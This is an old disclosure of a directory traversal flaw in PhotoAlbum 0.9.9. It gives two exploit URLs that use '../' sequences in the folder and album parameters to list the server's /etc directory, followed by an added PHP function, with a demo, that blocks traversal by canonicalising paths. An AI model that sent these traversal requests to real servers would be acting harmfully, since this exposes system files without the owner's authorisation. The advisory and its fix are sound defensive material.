Exploit:
  Affected program: PhotoAlbum v 0.9.9
  Any user is able to pass a directory as a request
  to the script; the script will read the directory
  and output all files in it to which it has read
  access. For instance:

http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/

Synnergy Networks
==============================
http://www.synnergy.net




For versions older than 0.9.9...
http://www.siteaffected.com/phpPhotoAlbum/getalbum.php?album=../../../etc/
will show the /etc directory.

--------------------------------------------------------
ThE MaDj0kEr (KPK)
--------------------------------------------------------
mad@j0ker.net           | http://www.j0ker.net
--------------------------------------------------------
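
One way to close both the `folder` and `album` cases reported above is to canonicalise the requested path and refuse anything that resolves outside the album root. This is an added example, not code from either post or from PhotoAlbum; `resolve_album_dir`, the album root and the demo directory names are hypothetical.

```php
<?php
// Added example: hypothetical helper, not PhotoAlbum's own code.
// Resolves a user-supplied folder name against a fixed album root and
// refuses anything that canonicalises to a location outside that root.
function resolve_album_dir(string $albumRoot, string $requested): ?string
{
    // Reject NUL bytes outright; old PHP versions truncated paths at them.
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    $root = realpath($albumRoot);
    if ($root === false) {
        return null; // album root missing or unreadable
    }

    // realpath() collapses "..", "." and symlinks, and returns false
    // when the target does not exist.
    $target = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_dir($target)) {
        return null;
    }

    // Compare against the root plus a trailing separator, so a sibling
    // such as "/srv/albums-private" is not treated as inside "/srv/albums".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $root && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a throwaway album tree and the request shapes above.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'albums_demo_' . getmypid();
@mkdir($root . DIRECTORY_SEPARATOR . 'holiday', 0700, true);

$samples = [
    'holiday',                    // legitimate album
    '../../../../../../../etc/',  // value from the explorer.php request
    '../../../etc/',              // value from the getalbum.php request
    'holiday/../..',              // climbs out after a valid prefix
];
foreach ($samples as $s) {
    $r = resolve_album_dir($root, $s);
    printf("%-28s => %s\n", $s, $r === null ? 'REJECTED' : $r);
}
rmdir($root . DIRECTORY_SEPARATOR . 'holiday');
rmdir($root);
```

The check is made on the resolved path rather than by stripping `../` from the input, so encoded or nested traversal sequences and symlinks that point outside the root are handled by the same comparison.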